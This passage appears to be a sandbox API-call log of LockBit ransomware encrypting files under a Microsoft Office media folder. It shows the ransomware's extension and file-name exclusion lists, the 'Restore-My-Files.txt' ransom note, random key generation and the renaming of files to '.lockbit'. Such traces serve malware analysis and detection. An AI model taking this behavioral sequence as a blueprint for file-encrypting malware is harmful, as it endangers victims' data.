(_Block=0x1fa2ed8) [0210.175] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21512_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0210.175] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0210.175] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0210.175] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd4a4400, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbcef9740, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbd4a4400, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0x24e, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21527_.GIF", cAlternateFileName="")) returned 1 [0210.175] lstrcmpiW (lpString1=".", lpString2="BD21527_.GIF") returned -1 [0210.175] lstrcmpiW (lpString1="..", lpString2="BD21527_.GIF") returned -1 [0210.176] PathFindExtensionW (pszPath="BD21527_.GIF") returned=".GIF" [0210.176] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0210.176] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0210.176] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0210.176] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0210.176] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0210.176] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0210.176] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0210.176] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0210.176] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0210.176] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0210.176] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0210.176] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0210.176] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0210.176] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0210.176] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0210.176] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0210.176] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0210.176] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0210.176] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0210.177] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0210.177] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0210.177] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0210.177] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0210.177] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0210.177] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0210.177] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0210.177] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0210.177] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0210.177] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0210.177] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0210.177] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0210.177] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0210.177] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0210.177] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0210.177] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0210.177] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0210.177] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0210.177] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0210.177] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0210.178] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0210.178] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0210.178] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0210.178] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0210.178] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0210.178] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0210.178] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0210.178] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0210.178] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21527_.GIF") returned 1 [0210.178] lstrcmpiW (lpString1="ntldr", lpString2="BD21527_.GIF") returned 1 [0210.178] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21527_.GIF") returned 1 [0210.178] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21527_.GIF") returned 1 [0210.178] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21527_.GIF") returned -1 [0210.178] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21527_.GIF") returned 1 [0210.178] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21527_.GIF") returned 1 [0210.178] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0210.178] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21527_.GIF") returned=".GIF" [0210.178] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0210.178] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0210.179] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0210.179] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0210.179] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0210.179] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0210.179] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0210.179] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0210.179] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0210.179] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0210.179] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0210.179] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0210.179] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0210.179] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0210.179] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0210.179] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0210.179] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0210.179] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0210.179] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0210.179] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0210.179] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0210.179] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0210.179] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0210.180] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0210.180] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0210.180] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0210.180] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0210.180] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0210.180] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21527_.GIF.lockbit") returned 76 [0210.180] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21527_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21527_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x238 [0210.181] CreateIoCompletionPort (FileHandle=0x238, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0210.181] malloc (_Size=0x40068) returned 0x1ff1e60 [0210.182] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=590) returned 1 [0210.182] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.182] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.182] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0210.182] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.183] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.183] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0210.183] ReadFile (in: hFile=0x238, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0210.184] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21527_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21527_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.184] malloc (_Size=0xae) returned 0x1fa2ed8 [0210.184] NtSetInformationFile (FileHandle=0x238, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0210.195] free (_Block=0x1fa2ed8) [0210.195] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21527_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0210.195] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0210.195] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0210.195] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15814600, ftCreationTime.dwHighDateTime=0x1bd8f93, ftLastAccessTime.dwLowDateTime=0xbcf1f8a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x15814600, ftLastWriteTime.dwHighDateTime=0x1bd8f93, nFileSizeHigh=0x0, nFileSizeLow=0x73d, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21548_.GIF", cAlternateFileName="")) returned 1 [0210.195] lstrcmpiW (lpString1=".", lpString2="BD21548_.GIF") returned -1 [0210.196] lstrcmpiW (lpString1="..", lpString2="BD21548_.GIF") returned -1 [0210.196] PathFindExtensionW (pszPath="BD21548_.GIF") returned=".GIF" [0210.196] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0210.196] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0210.196] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0210.196] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0210.196] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0210.196] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0210.196] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0210.196] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0210.196] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0210.196] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0210.196] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0210.196] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0210.196] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0210.196] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0210.196] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0210.196] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0210.196] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0210.196] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0210.196] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0210.196] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0210.196] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0210.196] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0210.196] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0210.196] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0210.196] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0210.197] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0210.197] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0210.197] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0210.197] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0210.197] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0210.197] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0210.197] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0210.197] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0210.197] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0210.197] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0210.197] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0210.197] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0210.197] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0210.197] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0210.197] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0210.197] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0210.197] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0210.197] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0210.197] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0210.197] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0210.197] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0210.197] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0210.197] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21548_.GIF") returned 1 [0210.197] lstrcmpiW (lpString1="ntldr", lpString2="BD21548_.GIF") returned 1 [0210.197] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21548_.GIF") returned 1 [0210.197] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21548_.GIF") returned 1 [0210.197] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21548_.GIF") returned -1 [0210.197] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21548_.GIF") returned 1 [0210.197] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21548_.GIF") returned 1 [0210.198] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0210.198] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21548_.GIF") returned=".GIF" [0210.198] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0210.198] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0210.198] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0210.198] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0210.198] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0210.198] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0210.198] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0210.198] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0210.198] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0210.198] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0210.198] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0210.198] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0210.198] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0210.198] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0210.198] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0210.198] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0210.198] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0210.198] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0210.198] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0210.198] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0210.198] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0210.198] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0210.198] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0210.198] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0210.198] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0210.198] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0210.199] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0210.199] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0210.199] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21548_.GIF.lockbit") returned 76 [0210.199] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21548_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd21548_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x238 [0210.200] CreateIoCompletionPort (FileHandle=0x238, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0210.200] malloc (_Size=0x40068) returned 0x3df0008 [0210.200] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1853) returned 1 [0210.200] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.201] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.201] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0210.201] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.201] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.201] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0210.201] ReadFile (in: hFile=0x238, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0210.205] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21548_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21548_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.205] malloc (_Size=0xae) returned 0x1fa2ed8 [0210.205] NtSetInformationFile (FileHandle=0x238, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0210.206] free (_Block=0x1fa2ed8) [0210.206] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD21548_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0210.206] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0210.206] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0210.206] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51d3ee00, ftCreationTime.dwHighDateTime=0x1bd9367, ftLastAccessTime.dwLowDateTime=0xbd408600, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x51d3ee00, ftLastWriteTime.dwHighDateTime=0x1bd9367, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0115855.GIF", cAlternateFileName="")) returned 1 [0210.206] lstrcmpiW (lpString1=".", lpString2="J0115855.GIF") returned -1 [0210.206] lstrcmpiW (lpString1="..", lpString2="J0115855.GIF") returned -1 [0210.206] PathFindExtensionW (pszPath="J0115855.GIF") returned=".GIF" [0210.207] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0210.207] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0210.207] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0210.207] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0210.207] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0210.207] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0210.207] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0210.207] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0210.207] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0210.207] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0210.207] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0210.207] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0210.207] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0210.207] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0210.207] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0210.207] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0210.207] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0210.207] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0210.207] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0210.207] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0210.207] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0210.207] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0210.207] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0210.208] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0210.208] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0210.208] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0210.208] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0210.208] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0210.208] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0210.208] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0210.208] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0210.208] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0210.208] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0210.208] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0210.208] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0210.208] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0210.208] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0210.208] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0210.208] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0210.208] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0210.208] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0210.208] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0210.208] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0210.208] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0210.208] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0210.208] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0210.208] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0210.208] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0115855.GIF") returned 1 [0210.208] lstrcmpiW (lpString1="ntldr", lpString2="J0115855.GIF") returned 1 [0210.208] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0115855.GIF") returned 1 [0210.208] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0115855.GIF") returned -1 [0210.208] lstrcmpiW (lpString1="autorun.inf", lpString2="J0115855.GIF") returned -1 [0210.208] lstrcmpiW (lpString1="thumbs.db", lpString2="J0115855.GIF") returned 1 [0210.209] lstrcmpiW (lpString1="iconcache.db", lpString2="J0115855.GIF") returned -1 [0210.209] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0210.209] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\J0115855.GIF") returned=".GIF" [0210.209] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0210.209] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0210.209] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0210.209] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0210.209] 